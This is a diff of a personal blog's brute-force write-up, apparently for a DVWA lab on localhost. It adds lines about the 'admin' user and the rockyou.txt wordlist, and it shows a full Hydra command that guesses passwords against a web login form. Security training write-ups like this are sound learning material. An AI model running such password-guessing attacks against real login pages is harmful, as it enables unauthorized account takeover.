Kwangyun/Kwangyun.github.io/_posts/2023-05-22-BruteForceWriteup.md

 ## Proof of Concept
 For POC, we will make use of the Hydra tool for brute forcing the following login page.
 ![이미지](/assets/loginpage.png)
 In order to use Hydra, we figure out that the login is using a http-get-form.
-We will then use the following code
+We also know that the user is 'admin'.
+We will make use of the famous rockyou.txt password list for our brute force attack.
 ```bash
 hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."
 ````